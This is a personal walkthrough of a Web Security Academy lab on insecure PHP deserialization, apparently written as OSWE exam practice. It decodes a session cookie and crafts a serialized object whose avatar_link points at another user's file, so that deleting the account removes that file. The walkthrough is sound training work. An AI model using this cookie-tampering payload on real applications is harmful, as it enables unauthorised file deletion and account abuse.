[Web Security Academy] Insecure Deserialization (1)

(Lab 1 and 2 are skipped because the contents are easy. The main purpose for this practice is to prepare myself for OSWE exam.)

Lab 3: Using application functionality to exploit insecure deserialization

Intro

This lab uses a serialization-based session mechanism. A certain feature invokes a dangerous method on data provided in a serialized object. To solve the lab, edit the serialized object in the session cookie and use it to delete the morale.txt file from Carlos’s home directory.
You can access your own account using the following credentials: wiener:peter
You also have access to a backup account: gregg:rosebud

Solution

1. Notice that “My Account” Page Cookie after login:

   Cookie: session=Tzo0OiJVc2VyIjozOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czoxMjoiYWNjZXNzX3Rva2VuIjtzOjMyOiJOWDVsc21ucVI5TWZTb2wwQVZIRTRRbU40R3lsYW9yZSI7czoxMToiYXZhdGFyX2xpbmsiO3M6MTk6InVzZXJzL3dpZW5lci9hdmF0YXIiO30%3d

2. Decode the base64 cookie:

   O:4:"User":3:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"NX5lsmnqR9MfSol0AVHE4QmN4Gylaore";s:11:"avatar_link";s:19:"users/wiener/avatar"O30%3d

   Take note that avatar_link is referred in the cookie. Meanwhile, Delete Account button sends a post request to delete the current account. To delete the morale.txt file from Carlo’s home directory, it is clear that crafting the cookie and delete the account is one possible way.

3. Craft the cookie:

   O:4:"User":3:{s:8:"username";s:5:"gregg";s:12:"access_token";s:32:"OsTWRNgOgwIgdfjwDk6SgFT5iKZTbHx8";s:11:"avatar_link";s:23:"/home/carlos/morale.txt";}
   

   Encode it with base64:

   Tzo0OiJVc2VyIjozOntzOjg6InVzZXJuYW1lIjtzOjU6ImdyZWdnIjtzOjEyOiJhY2Nlc3NfdG9rZW4iO3M6MzI6Ik9zVFdSTmdPZ3dJZ2RmandEazZTZ0ZUNWlLWlRiSHg4IjtzOjExOiJhdmF0YXJfbGluayI7czoyMzoiL2hvbWUvY2FybG9zL21vcmFsZS50eHQiO30=

4. Replace the cookie with the crafted one when delete the account.